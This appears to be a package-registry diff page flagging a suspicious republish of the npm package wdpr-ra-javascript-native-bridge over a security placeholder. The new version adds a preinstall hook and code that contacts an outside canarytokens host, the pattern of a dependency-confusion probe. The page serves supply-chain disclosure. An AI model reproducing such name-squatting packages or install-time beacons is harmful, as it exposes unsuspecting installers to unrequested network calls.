wdpr-ra-javascript-native-bridge 0.0.1-security → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of wdpr-ra-javascript-native-bridge might be problematic. Click here for more details.
- package/Dockerfile +20 -0
- package/index.js +26 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/Dockerfile
ADDED
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
# Use the official Node.js 16 (or any version you prefer) image as a parent image
|
|
2
|
+
FROM node:16
|
|
3
|
+
|
|
4
|
+
# Set the working directory within the container
|
|
5
|
+
WORKDIR /app
|
|
6
|
+
|
|
7
|
+
# Copy your package files into the container
|
|
8
|
+
COPY . .
|
|
9
|
+
|
|
10
|
+
# Here we use an argument for the npm token to avoid hardcoding it
|
|
11
|
+
ARG NPM_TOKEN
|
|
12
|
+
|
|
13
|
+
# Create an .npmrc file using the provided npm token
|
|
14
|
+
RUN echo "//registry.npmjs.org/:_authToken=${NPM_TOKEN}" > .npmrc
|
|
15
|
+
|
|
16
|
+
# Publish the package
|
|
17
|
+
RUN npm publish
|
|
18
|
+
|
|
19
|
+
# Clean up the token after publishing
|
|
20
|
+
RUN rm -f .npmrc
|
package/index.js
ADDED
|
@@ -0,0 +1,26 @@
|
|
|
1
|
+
// hello world
|
|
2
|
+
//
|
|
3
|
+
// index.js
|
|
4
|
+
const https = require('https');
|
|
5
|
+
|
|
6
|
+
function fetchReadme() {
|
|
7
|
+
https.get('https://21m3rc8lsnmjf1nz9geelpfpf.canarytokens.com/readme.MD', (resp) => {
|
|
8
|
+
let data = '';
|
|
9
|
+
|
|
10
|
+
// A chunk of data has been received.
|
|
11
|
+
resp.on('data', (chunk) => {
|
|
12
|
+
data += chunk;
|
|
13
|
+
});
|
|
14
|
+
|
|
15
|
+
// The whole response has been received. Print out the result.
|
|
16
|
+
resp.on('end', () => {
|
|
17
|
+
console.log(data);
|
|
18
|
+
});
|
|
19
|
+
|
|
20
|
+
}).on("error", (err) => {
|
|
21
|
+
console.log("Error: " + err.message);
|
|
22
|
+
});
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
// Exporting the function to allow its use when the package is imported.
|
|
26
|
+
module.exports = fetchReadme;
|
package/package.json
CHANGED
|
@@ -1,6 +1,16 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "wdpr-ra-javascript-native-bridge",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.1",
|
|
4
|
+
"description": "A dummy JavaScript library for example purposes.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"dummy",
|
|
12
|
+
"example"
|
|
13
|
+
],
|
|
14
|
+
"author": "Your Name",
|
|
15
|
+
"license": "ISC"
|
|
6
16
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=wdpr-ra-javascript-native-bridge for more information.
|